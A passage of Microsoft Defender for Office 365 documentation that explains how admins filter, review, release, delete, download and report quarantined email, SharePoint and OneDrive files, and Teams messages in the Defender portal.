- - **Last 7 days**
- - **Last 14 days**
- - **Last 30 days** (default)
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Expires**: Filter messages by when they expire from quarantine:
- - **Today**
- - **Next 2 days**
- - **Next 7 days**
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Recipient tag**: Currently, the only selectable [user tag](user-tags-about.md) is Priority account.-- **Quarantine reason**:
- - **Transport rule** (mail flow rule)
- - **Bulk**
- - **Spam**
- - **Data loss prevention**
- - **Malware**: Anti-malware policies in EOP or Safe Attachments policies in Defender for Office 365. The **Policy Type** value indicates which feature was used.
- - **Phishing**: The spam filter verdict was **Phishing** or anti-phishing protection quarantined the message ([spoof settings](anti-phishing-policies-about.md#spoof-settings) or [impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)).
- - **High confidence phishing**
- - **Admin action - File type block**: Messages blocked as malware by the common attachments filter in anti-malware policies. For more information, see [Anti-malware policies](anti-malware-protection-about.md#anti-malware-policies).
-- **Recipient**: **All users** or **Only me**. End users can only manage quarantined messages sent to them.-- **Release status**: Any of the following values:
- - **Needs review**
- - **Approved**
- - **Denied**
- - **Release requested**
- - **Released**
- - **Preparing to release**
- - **Error**
-- **Policy type**: Filter messages by policy type:
- - **Anti-malware policy**
- - **Safe Attachments policy**
- - **Anti-phishing policy**
- - **Anti-spam policy**
- - **Transport rule** (mail flow rule)
- - **Data loss prevention rule**
-
- The **Policy type** and **Quarantine reason** values are interrelated. For example, **Bulk** is always associated with an **Anti-spam policy**, never with an **Anti-malware policy**.
-
-When you're finished on the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-> [!TIP]
-> Filters are cached. The filters from the last sessions are selected by default the next time you open the **Quarantine** page. This behavior helps with triage operations.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific messages. Wildcards aren't supported. You can search by the following values:
--- Sender email address-- Subject. Use the entire subject of the message. The search isn't case-sensitive.-
-After you've entered the search criteria, press Enter to filter the results.
-
-> [!NOTE]
-> The **Search** box searches for quarantined items in the current view (which is limited to 100 items), not all quarantined items. To search all quarantined items, use **Filter** and the resulting **Filters** flyout.
-
-After you find a specific quarantined message, select the message to view details about it and to take action on it (for example, view, release, download, or delete the message).
-
-> [!TIP]
-> On mobile devices, the previously described controls are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More**.
->
-> :::image type="content" source="../../media/quarantine-message-main-page-mobile-actions.png" alt-text="Screenshot of selecting a quarantined message and then selecting More on a mobile device." lightbox="../../media/quarantine-message-main-page-mobile-actions.png":::
-
-### View quarantined email details
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Email** tab. Or, to go directly to the **Email** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Email>.
-
-2. On the **Email** tab, select the quarantined message by clicking anywhere in the row other than the check box.
-
-In the details flyout that opens, the following information is available:
-
- > [!TIP]
- > The actions that are available at the top of the flyout are described in [Take action on quarantined email](#take-action-on-quarantined-email).
- >
- > To see details about other quarantined messages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
--- **Quarantine details** section:
- - **Received**: The date/time when the message was received.
- - **Expires**: The date/time when the message is automatically and permanently deleted from quarantine.
- - **Subject**
- - **Quarantine reason**: Shows if a message has been identified as **Spam**, **Bulk**, **Phish**, matched a mail flow rule (**Transport rule**), or was identified as containing **Malware**.
- - **Policy type**
- - **Policy name**
- - **Recipient count**
- - **Recipients**: If the message contains multiple recipients, you might need to use [Preview message](#preview-email-from-quarantine) or [View message header](#view-email-message-headers) to see the complete list of recipients.
-
- Recipient email addresses always resolve to the primary email address, even if the message was sent to a [proxy address](/exchange/recipients-in-exchange-online/manage-user-mailboxes/add-or-remove-email-addresses).
-
- - **Released to** or **Not yet released to**: If the message requires review by an admin before it's released:
- - **Released to**: Email addresses of recipients that the message was released to.
- - **Not yet released to**: Email addresses of recipients that the message hasn't been released to.
-
-The rest of the details flyout contains the **Delivery details**, **Email details**, **URLs**, and **Attachments** sections that are part of the _Email summary panel_. For more information, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
--
-To take action on the message, see the next section.
-
-> [!TIP]
-> To see details about other quarantined messages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-### Take action on quarantined email
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Email** tab. Or, to go directly to the **Email** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Email>.
-
-2. On the **Email** tab, select the quarantined email message by using either of the following methods:
-
- - Select the message from the list by selecting the check box next to the first column. The available actions are no longer grayed out.
-
- :::image type="content" source="../../media/quarantine-message-selected-message-actions.png" alt-text="Screenshot of the available actions after you select the check box of a quarantined message on the Email tab on the Quarantine page." lightbox="../../media/quarantine-message-selected-message-actions.png":::
-
- - Select the message from the list by clicking anywhere in the row other than the check box. The available actions are in the details flyout that opens.
-
- :::image type="content" source="../../media/quarantine-message-details-flyout-actions.png" alt-text="Screenshot of the available actions in the details flyout that opens after you select a quarantined message on the Email tab of the Quarantine page." lightbox="../../media/quarantine-message-details-flyout-actions.png":::
-
- Using either method to select the message, many actions are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** or **More options**.
-
-After you select the quarantined message, the available actions are described in the following subsections.
-
-> [!TIP]
-> On mobile devices, the action experience is slightly different:
->
-> - When you select the message by selecting the check box, all actions are under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More**:
->
-> :::image type="content" source="../../media/quarantine-message-main-page-mobile-actions.png" alt-text="Screenshot of selecting a quarantined message and selecting More on a mobile device." lightbox="../../media/quarantine-message-main-page-mobile-actions.png":::
->
-> - When you select the message by clicking anywhere in the row other than the check box, description text isn't available on some of the action icons in the details flyout. But, the actions and their order is the same as on a PC:
->
-> :::image type="content" source="../../media/quarantine-message-details-flyout-mobile-actions.png" alt-text="Screenshot of the details of a quarantined message with available actions highlighted." lightbox="../../media/quarantine-message-details-flyout-mobile-actions.png":::
-
-#### Release quarantined email
-
-This action isn't available for email messages that have already been released (the **Release status** value is **Released**).
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
--- You can't release a message to the same recipient more than once.-- When you select individual original recipients to receive the released message, you can select only recipients who haven't already received the released message.-- Members of the **Security Administrators** role group can see and use the **Submit the message to Microsoft to improve detection** and **Allow email with similar attributes** options.-- Users can report false positives to Microsoft from quarantine, depending on the value of the **Reporting from quarantine** setting in [user reported settings](submissions-user-reported-messages-custom-mailbox.md).-
-> [!TIP]
->
-> - Third party anti-virus solutions, security services, and [outbound connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow) can cause the following issues for messages that are released from quarantine:
-> - The message is quarantined after being released.
-> - Content is removed from the released message before it reaches the recipient's Inbox.
-> - The released message never arrives in the recipient's Inbox.
-> - Actions in [quarantine notifications](quarantine-quarantine-notifications.md) might be randomly selected.
->
-> Verify that you aren't using third party filtering before you open a support ticket about these issues.
->
-> - Inbox rules (created by users in Outlook or by admins by using the **\*-InboxRule** cmdlets in Exchange Online PowerShell) can move or delete messages from the Inbox.
->
-> Admins can use [message trace](message-trace-defender-portal.md) to determine if a released message was delivered to the recipient's Inbox.
-
-After you select the message, use either of the following methods to release it:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release email**.-
-In the **Release email to recipient inboxes** flyout that opens, configure the following options:
--- Select one of the following values:
- - **Release to all recipients**
- - **Release to one or more of the original recipients of the email**: Enter the recipients in the **Recipients** box that appears.
--- **Send a copy of this message to another recipient**: If you select this option, select one or more recipients by clicking in the **Recipients** box that appears.--- **Submit the message to Microsoft to improve detection**: If you select this option, the erroneously quarantined message is reported to Microsoft as a false positive. Depending on the results of their analysis, the service-wide spam filter rules might be adjusted to allow the message through.-
- Selecting this option reveals the following options:
-
- - **Allow this message**: If you select this option, allow entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options also appear:
- - **Remove entry after**: The default value is **30 days**, but you can also select **1 day**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Allow entry note**: Enter an optional note that contains additional information.
-
-When you're finished on the **Release email to recipient inboxes** flyout, select **Release message**.
-
-Back on the **Email** tab, the **Release status** value of the message is **Released**.
-
-#### Approve or deny release requests from users for quarantined email
-
-Users can request the release of email messages if the quarantine policy used **Allow recipients to request a message to be released from quarantine** (`PermissionToRequestRelease` permission) instead of **Allow recipients to release a message from quarantine** (`PermissionToRelease` permission) when the message was quarantined. For more information, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-After a recipient requests the release of the email message, the **Release status** value changes to **Release requested**, and an admin can approve or deny the request.
-
-> [!TIP]
-> One alert to release the message might be created for multiple release requests for that message. Use the **quarantine** link in the **Details** section of the alert message to take action on the release request from users in the organization for the past 7 days.
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the message, use either of the following methods to approve or deny the release request:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Approve release** or :::image type="icon" source="../../media/m365-cc-sc-deny-icon.png" border="false"::: **Deny**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** and then select **Approve release** or :::image type="icon" source="../../media/m365-cc-sc-deny-icon.png" border="false"::: **Deny release**.-
-If you select **Approve release**, an **Approve release** flyout opens where you can review information about the message. To approve the request, select **Approve release**. A **Release approved** flyout opens where you can select the link to learn more about releasing messages. Select **Done** when you're finished on the **Release approved** flyout. Back on the **Email** tab, the **Release status** value of the message changes to **Approved**.
-
-If you select **Deny**, a **Deny release** flyout opens where you can review information about the message. To deny the request, select **Deny release**. A **Release denied** flyout opens where you can select the link to learn more about releasing messages. Select **Done** when you're finished on the **Release denied** flyout. Back on the **Email** tab, the **Release status** value of the message changes to **Denied**.
-
-> [!TIP]
-> You can deny release for all recipients only. You can't deny release for specific recipients.
-
-#### Delete email from quarantine
-
-When you delete an email message from quarantine, the message is removed and isn't sent to the original recipients.
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the message, use either of the following methods to remove it:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete from quarantine**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete from quarantine**.-
-In the **Delete (n) messages from quarantine** flyout that opens, use one of the following methods to delete the message:
--- Select **Permanently delete the message from quarantine** and then select **Delete**: The message is permanently deleted and isn't recoverable.-- Select **Delete** only: The message is deleted, but is potentially recoverable.-
-After you select **Delete** on the **Delete (n) messages from quarantine** flyout, you return to the **Email** tab where the message is no longer listed.
-
-#### Preview email from quarantine
-
-After you select the message, use either of the following methods to preview it:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-preview-message-icon.png" border="false"::: **Preview message**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-preview-message-icon.png" border="false"::: **Preview message**.-
-In the flyout that opens, choose one of the following tabs:
--- **Source**: Shows the HTML version of the message body with all links disabled.-- **Plain text**: Shows the message body in plain text.-
-#### View email message headers
-
-After you select the message, use either of the following methods to view the message headers:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View message headers**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View message headers**.-
-In the **Message header** flyout that opens, the message header (all header fields) is shown.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy message header** to copy the message header to the clipboard.
-
-Select the **Microsoft Message Header Analyzer** link to analyze the header fields and values in depth. Paste the message header into the **Insert the message header you would like to analyze** section (CTRL+V or right-click and choose **Paste**), and then select **Analyze headers**.
-
-#### Report email to Microsoft for review from quarantine
-
-After you select the message, use either of the following methods to report the message to Microsoft for analysis:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit for review**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit for review**.-
-In the **Submit to Microsoft for analysis** flyout that opens, configure the following options:
--- **Add the network message ID or upload the email file**: Select one of the following options:
- - **Add the email network message ID**: This value is selected by default, with the corresponding value in the box.
- - **Upload the email file (.msg or eml)**: After you select this option, select the :::image type="icon" source="../../media/m365-cc-sc-import-icon.png" border="false":::**Browse files** button that appears to find and select the .msg or .eml message file to submit.
--- **Choose a recipient who had an issue**: Select one (preferred) or more original recipients of the message to analyze the policies that were applied to them.--- **Select a reason for submitting to Microsoft**: Choose one of the following options:-
- - **I've confirmed it's clean** (default): Select this option if you're sure that the message is clean, and then select **Next**. Then the following settings are available:
- - **Allow this email**: If you select this option, allow entries are added to the [Tenant Allow/Block List](tenant-allow-block-list-about.md) for the sender and any related URLs or attachments in the message. The following options also appear:
- - **Remove entry after**: The default value is **30 days**, but you can also select **1 day**, **7 days**, or a **Specific date** that's less than 30 days.
- - **Allow entry note**: Enter an optional note that contains additional information.
-
- - **It appears clean**: Select this option if you're unsure and you want a verdict from Microsoft.
-
-When you're finished on the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
-> [!TIP]
-> Users can report false positives to Microsoft from quarantine, depending on the value of the **Reporting from quarantine** setting in [user reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-#### Block email senders from quarantine
-
-The Block senders action adds the sender of the selected email message to the Blocked Senders list **in the mailbox of whomever is signed in**. Typically, this action is used by end-users if it's available to them by [quarantine policies](quarantine-policies.md#anatomy-of-a-quarantine-policy). For more information about users blocking senders, see [Block a mail sender](https://support.microsoft.com/office/b29fd867-cac9-40d8-aed1-659e06a706e4)
-
-After you select the message, use either of the following methods to add the message sender to the Blocked Senders list in **your** mailbox:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-block-sender-icon.png" border="false"::: **Block sender**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-block-sender-icon.png" border="false"::: **Block sender**.-
-In the **Block sender** flyout that opens, review the information about the sender, and then select **Block**.
-
-> [!TIP]
-> The organization can still receive mail from the blocked sender. Messages from the sender are delivered to user Junk Email folders or to quarantine. To delete messages from the sender upon arrival, use [mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules) to **Block the message**.
-
-#### Share email from quarantine
-
-You can send a copy of the quarantined email message, including potentially harmful content, to the specified recipients.
-
-After you select the message, use either of the following methods to send a copy of it to others:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-share-email-icon.png" border="false"::: **Share email**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-share-email-icon.png" border="false"::: **Share email**.-
-In the **Share email with other users** flyout that opens, select one or more recipients to receive a copy of the message. When you're finished, select **Share**.
-
-#### Download email from quarantine
-
-After you select the email message, use either of the following methods to download it:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download messages**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download message**.-
-In the **Download file** flyout that opens, enter the following information:
--- **Reason for downloading file**: Enter descriptive text.-- **Create password** and **Confirm password**: Enter a password that's required to open the downloaded message file.-
-When you're finished on the **Download file** flyout, select **Download**.
-
-When the download is ready, a **Save As** dialog opens for you to view or change the downloaded filename and location. By default, The .eml message file is saved in a compressed file named Quarantined Messages.zip in your **Downloads** folder. If the .zip file already exists, a number is appended to the filename (for example, Quarantined Messages(1).zip).
-
-Accept or change the downloaded file details, and then select **Save**.
-
-Back on the **Download file** flyout, select **Done**.
-
-#### Actions for quarantined email messages in Defender for Office 365
-
-In organizations with Microsoft Defender for Office 365 (add-on licenses or included in subscriptions like Microsoft 365 E5 or Microsoft 365 Business Premium), the following actions are also available in the details flyout of a selected message:
--- :::image type="icon" source="../../medi#whats-on-the-email-entity-page).--- :::image type="icon" source="../../medi#actions-on-the-email-entity-page).-
-#### Take action on multiple quarantined email messages
-
-When you select multiple quarantined messages on the **Email** tab by selecting the check boxes next to the first column, the following bulk actions are available on the **Email** tab (depending on the **Release status** values of the messages that you selected):
--- [Release quarantined email](#release-quarantined-email)-
- The only available options to select for bulk actions are **Send a copy of this message to other recipients in your organization** and **Send the message to Microsoft to improve detection (false positive)**.
--- [Approve or deny release requests from users for quarantined email](#approve-or-deny-release-requests-from-users-for-quarantined-email)-- [Delete email from quarantine](#delete-email-from-quarantine)-- [Report email to Microsoft for review from quarantine](#report-email-to-microsoft-for-review-from-quarantine)-
- The only available options to select for bulk actions are **Allow emails with similar attributes** and the related **Remove allow entry after** and **Allow entry note** options.
--- [Download email from quarantine](#download-email-from-quarantine)--
-### Find who deleted a quarantined message
-
-By default, many security policy verdicts allow users to delete their quarantined messages (messages where they're a recipient). For more information, see the table at [Manage quarantined messages and files as a user](quarantine-end-user.md).
-
-Admins can search the audit log to find events for messages that were deleted from quarantine by using the following procedures:
-
-1. In the Defender portal at <https://security.microsoft.com>, go to **Audit**. Or, to go directly to the **Audit** page, use <https://security.microsoft.com/auditlogsearch>.
-
- > [!TIP]
- > You can also get to the **Audit** page in the Microsoft Purview compliance portal at <https://compliance.microsoft.com/auditlogsearch>
-
-2. On the **Audit** page, verify that the **New Search** tab is selected, and then configure the following settings:
-
- - **Date and time range (UTC)**
- - **Activities - friendly names**: Click in the box, start typing "quarantine" in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box that appears, and then select **Deleted Quarantine message** from the results.
- - **Users**: If know who deleted the message from quarantine, you can further filter the results by user.
-
-3. When you're finished entering the search criteria, select **Search** to generate the search.
-
-For complete instructions for audit log searches, see [Audit New Search](/purview/audit-new-search).
-
-## Use the Microsoft Defender portal to manage quarantined files in Defender for Office 365
-
-> [!NOTE]
-> The procedures for quarantined files in this section are available only to Microsoft Defender for Office 365 Plan 1 or Plan 2 subscribers.
->
-> Files quarantined in SharePoint or OneDrive are removed from quarantine after 30 days, but the blocked files remain in SharePoint or OneDrive in the blocked state.
-
-In organizations with Defender for Office 365, admins can manage files that were quarantined by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams. To enable protection for these files, see [Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-configure.md).
-
-### View quarantined files
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Files** tab. Or, to go directly to the **Files** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Files>.
-
-On the **Files** tab, you can decrease the vertical spacing in the list by clicking :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal** and then selecting :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **User**<sup>\*</sup>-- **Location**<sup>\*</sup>: The value is **SharePoint** or **OneDrive**.-- **Attachment filename**<sup>\*</sup>-- **File URL**<sup>\*</sup>-- **File Size**-- **Release status**<sup>\*</sup>-- **Expires**<sup>\*</sup>-- **Detected by**-- **Modified by time**-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Time received**:
- - **Last 24 hours**
- - **Last 7 days**
- - **Last 14 days**
- - **Last 30 days** (default)
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Expires**:
- - **Custom** (default): Enter a **Start time** and **End time** (date).
- - **Today**
- - **Next 2 days**
- - **Next 7 days**
-- **Quarantine reason**: The only available value is **Malware**.-- **Policy type**: The only available value is **Unknown**.-
-When you're finished in the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific files by filename. Wildcards aren't supported.
-
-After you've entered the search criteria, press Enter to filter the results.
-
-After you find a specific quarantined file, select the file to view details about it and to take action on it (for example, view, release, download, or delete the file).
-
-### View quarantined file details
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Files** tab. Or, to go directly to the **Files** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Files>.
-
-2. On the **Files** tab, select the quarantined file by clicking anywhere in the row other than the check box.
-
-In the details flyout that opens, the following information is available:
---- **File details** section:
- - **File Name**
- - **File URL**: URL that defines the location of the file (for example, in SharePoint Online).
- - **Malicious content detected on** The date/time the file was quarantined.
- - **Expires**: The date when the file will be deleted from quarantine.
- - **Detected by**
- - **Released?**
- - **Malware Name**
- - **Document ID**: A unique identifier for the document.
- - **File Size**
- - **Organization** Your organization's unique ID.
- - **Last modified**
- - **Last modified By**: The user who last modified the file.
- - **Secure Hash Algorithm 256-bit (SHA-256) value**: You can use this hash value to identify the file in other reputation stores or in other locations in your environment.
-
-To take action on the file, see the next section.
-
-> [!TIP]
-> To see details about other quarantined files without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-### Take action on quarantined files
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Files** tab. Or, to go directly to the **Files** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Files>.
-
-2. On the **Files** tab, select the quarantined file by clicking anywhere in the row other than the check box.
-
-After you select the quarantined file, the available actions in the file details flyout that opens are described in the following subsections.
--
-#### Release quarantined files from quarantine
-
-This action isn't available for files that have already been released (the **Released status** value is **Released**).
-
-If you don't release or delete the file from quarantine, the file is removed from quarantine after the default quarantine retention period expires (as shown in the **Expires** column), but the blocked file remains in SharePoint or OneDrive in the blocked state.
-
-After you select the file, select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release file** in the file details flyout that opens.
-
-In the **Release files and report them to Microsoft** flyout that opens, view the file details in the **Report files to Microsoft for analysis** section, decide whether to select **Report files to Microsoft for analysis**, and then select **Release**.
-
-In the **Files have been released** flyout that opens, select **Done**.
-
-Back on the file details flyout, select **Close**.
-
-Back on the **Files** tab, the **Release status** value of the file is **Released**.
-
-#### Download quarantined files from quarantine
-
-After you select the file, select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download file** in the details flyout that opens.
-
-In the **Download file** flyout that opens, enter the following information:
--- **Reason for downloading file**: Enter descriptive text.-- **Create password** and **Confirm password**: Enter a password that's required to open the downloaded file.-
-When you're finished on the **Download file** flyout, select **Download**.
-
-When the download is ready, a **Save As** dialog opens for you to view or change the downloaded filename and location. By default, The file is saved in a compressed file named Quarantined Messages.zip in your **Downloads** folder. If the .zip file already exists, a number is appended to the filename (for example, Quarantined Messages(1).zip).
-
-Accept or change the downloaded file details, and then select **Save**.
-
-Back on the **Download file** flyout, select **Done**.
-
-#### Delete quarantined files from quarantine
-
-If you don't release or delete the file from quarantine, the file is removed from quarantine after the default quarantine retention period expires (as shown in the **Expires** column), but the blocked file remains in SharePoint or OneDrive in the blocked state.
-
-After you select the file, select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete from quarantine** in the details flyout that opens.
-
-Select **Continue** in the warning dialog that opens.
-
-Back on the **Files** tab, the file is no longer listed.
-
-#### Take action on multiple quarantined files
-
-When you select multiple quarantined files on the **Files** tab by selecting the check boxes next to the first column (up to 100 files), a **Bulk actions** dropdown list appears where you can take the following actions:
--- [Release quarantined files from quarantine](#release-quarantined-files-from-quarantine)-- [Delete quarantined files from quarantine](#delete-quarantined-files-from-quarantine)-- [Download quarantined files from quarantine](#download-quarantined-files-from-quarantine)--
-## Use the Microsoft Defender portal to manage Microsoft Teams quarantined messages
-
-> [!TIP]
-> [Zero-hour auto purge (ZAP) in Microsoft Teams](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-in-microsoft-teams) is currently in Preview, isn't available in all organizations, and is subject to change.
-
-Quarantine in Microsoft Teams is available only in organizations with Microsoft Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5).
-
-When a potentially malicious chat message is detected in Microsoft Teams, zero-hour auto purge (ZAP) removes the message and quarantines it. Admins can view and manage these quarantined Teams messages. The message is quarantined for 30 days. After that the Teams message is permanently removed.
-
-This feature is enabled by default.
-
-### View quarantined Teams messages
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Teams messages** tab. Or, to go directly to the **Teams messages** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Teams>.
-
-On the **Teams messages** tab, you can decrease the vertical spacing in the list by clicking :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal** and then selecting :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Teams message text**: Contains the subject for the Teams message.<sup>\*</sup>-- **Time received**: The time the message was received by the recipient.<sup>\*</sup>-- **Release status**: Shows whether the message is already reviewed and released or needs review. <sup>\*</sup>-- **Participants**: The total number of users who received the message.<sup>\*</sup>-- **Sender**: The person who sent the message that was quarantined.<sup>\*</sup>-- **Quarantine reason**: Available options are "High confidence phish" and "Malware".<sup>\*</sup>-- **Policy type**: The organization policy responsible for the quarantined message.<sup>\*</sup>-- **Expires**: Indicates the time after which the message is removed from quarantine. By default, this value is 30 days.<sup>\*</sup>-- **Recipient address**: Email address of the recipients.<sup>\*</sup>-- **Message ID**: Includes the chat message ID.-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Message ID**-- **Sender address**-- **Recipient address**-- **Subject**-- **Time received**:
- - **Last 24 hours**
- - **Last 7 days**
- - **Last 14 days**
- - **Last 30 days** (default)
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Expires**:
- - **Custom** (default): Enter a **Start time** and **End time** (date).
- - **Today**
- - **Next 2 days**
- - **Next 7 days**
-- **Quarantine reason**: Available values are **Malware** and **High confidence phishing**.-- **Recipient**: Select **All users** or **Only me**.-- **Review status**: Select **Needs review** and **Released**.-
-When you're finished in the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific Teams messages. Wildcards aren't supported.
-
-After you find a specific quarantined Teams message, select the message to view details about it and to take action on it (for example, view, release, download, or delete the message).
-
-### View quarantined Teams message details
-
-On the **Teams messages** tab of the **Quarantine** page, select the quarantined message by clicking anywhere in the row other than the check box next to the first column.
-
-The following message information is available at the top of the details flyout:
--- The title of the flyout is the subject or the first 100 characters of the Teams message.-- The **Quarantine reason** value.-- The number of links in the message.-- The available actions are described in the [Take action on quarantined Teams messages](#take-action-on-quarantined-teams-messages) section.-
-> [!TIP]
